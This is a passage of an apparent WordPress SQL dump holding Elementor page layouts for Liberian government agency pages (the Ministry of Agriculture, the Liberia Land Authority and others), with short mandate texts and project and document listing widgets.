page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8536,1596,'_dp_original','1594'),(8537,1596,'_edit_last','42'),(8540,1598,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8541,1598,'slide_template','default'),(8543,1598,'_elementor_template_type','wp-post'),(8544,1598,'_elementor_version','2.7.5'),(8545,1598,'_wp_page_template','default'),(8546,1598,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2d39894\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.<\\/p><p>Through its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"52624ff6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"6d47854\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3c330365\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"30a16cc2\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mot\\\",\\\"tag_id\\\":\\\"62\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mot\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6bd3aa21\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"69e27fd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df2b844\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9e5ee94\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mot\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8547,1598,'_dp_original','1596'),(8548,1598,'_edit_last','42'),(8551,1600,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8552,1600,'slide_template','default'),(8554,1600,'_elementor_template_type','wp-post'),(8555,1600,'_elementor_version','2.7.5'),(8556,1600,'_wp_page_template','default'),(8557,1600,'_elementor_data','[{\"id\":\"42f3301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e4b6de6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a1bb6a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7f350b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.<\\/p><p><span style=\\\"font-size: 14px;\\\">In addition, MOA ensures that agricultural challenges that impede production are investigated and lasting solutions found, and the farmers are provided with the supportive services and the enabling environment to produce.<\\/span><\\/p><p>The core general areas of responsibility of MOA will likely continue to consist of: agriculture, both smallholder and commercial; plantation crops; fisheries; and livestock.<\\/p><h4>Mandate<\\/h4><p>The Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b499042\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e7777d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"95e395c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ecf4b97\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"moa\\\",\\\"tag_id\\\":\\\"61\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"moa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc19bed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1cf2e8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d176b2f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"759bc05\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"138bbb1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"bb7acbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"855e3aa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:moa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8558,1600,'_dp_original','1598'),(8559,1600,'_edit_last','42'),(8562,1602,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8563,1602,'slide_template','default'),(8565,1602,'_elementor_template_type','wp-post'),(8566,1602,'_elementor_version','2.7.5'),(8567,1602,'_wp_page_template','default'),(8568,1602,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9160c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.<\\/p><p>The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia.\\u00a0<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"272fc6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"c718620\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98dfd4f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0986fea\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lla\\\",\\\"tag_id\\\":\\\"57\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lla\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eea10f6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cc28ee8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a346330\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"390048a\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lla\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8569,1602,'_dp_original','1600'),(8570,1602,'_edit_last','42'),(8573,1604,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8574,1604,'slide_template','default'),(8576,1604,'_elementor_template_type','wp-post'),(8577,1604,'_elementor_version','2.7.5'),(8578,1604,'_wp_page_template','default'),(8579,1604,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ddbf8c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"National Concession information coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7ae54ef2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"50d3d3a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7172f56c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"29eecb5b\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"concessions\\\",\\\"tag_id\\\":\\\"51\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"concessions\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4bb76f44\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"6e4d7076\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"19203562\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58c6b4a8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:concessions\\\" 